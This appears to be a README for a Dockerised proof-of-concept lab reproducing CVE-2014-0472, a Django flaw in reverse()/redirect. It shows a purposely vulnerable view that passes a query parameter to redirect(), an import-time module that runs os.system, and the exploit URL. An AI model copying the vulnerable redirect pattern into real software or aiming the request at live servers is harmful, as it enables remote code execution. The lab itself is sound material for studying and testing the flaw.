CVE-2014-0472 Django unexpected code execution using reverse()# CVE-2014-0472
Use
```
docker-compose up -d
```
Access localhost:8083
Reference:
[https://www.djangoproject.com/weblog/2014/apr/21/security/](https://www.djangoproject.com/weblog/2014/apr/21/security/)
>
> 1. One or more views are present which construct a URL based on user input (commonly, a "next" parameter in a querystring indicating where to redirect upon successful completion of an action).
> 2. One or more modules are known to an attacker to exist on the server's Python import path, which perform code execution with side effects on importing.
In `tests.py`
```python
def evil_function():
print("exploit successful")
os.system("echo > /tmp/`whoami` ")
return os.getuid()
evil = evil_function()
```
In `views.py`
```python
def redirect_test(request):
page = request.GET.get('page', None)
if page is not None:
redirect(page)
return HttpResponse("OK")
```
Use redirect function to call to the evil function
Use exp
```
http://your-ip:8083/example?page=app.tests.evil
```
Exploited
[4.0K] /data/pocs/5f26c2347ae30a2b1e8a9a2fd158c4fc5f85b659
├── [ 143] docker-compose.yml
├── [ 481] Dockerfile
├── [4.0K] img
│ ├── [ 95K] exec_evil.png
│ ├── [9.0K] exploit.png
│ └── [ 12K] tmp_list.png
├── [1.1K] README.md
├── [ 32] requirements.txt
└── [4.0K] vuln
├── [4.0K] app
│ ├── [ 63] admin.py
│ ├── [ 81] apps.py
│ ├── [ 0] __init__.py
│ ├── [4.0K] migrations
│ │ ├── [ 0] __init__.py
│ │ └── [4.0K] __pycache__
│ │ └── [ 152] __init__.cpython-37.pyc
│ ├── [ 57] models.py
│ ├── [ 213] tests.py
│ └── [ 289] views.py
├── [4.0K] CVE-2014-0472
│ ├── [ 403] asgi.py
│ ├── [ 0] __init__.py
│ ├── [2.5K] settings.py
│ ├── [ 820] urls.py
│ └── [ 403] wsgi.py
├── [120K] db.sqlite3
├── [ 661] manage.py
└── [ 167] run.sh
6 directories, 23 files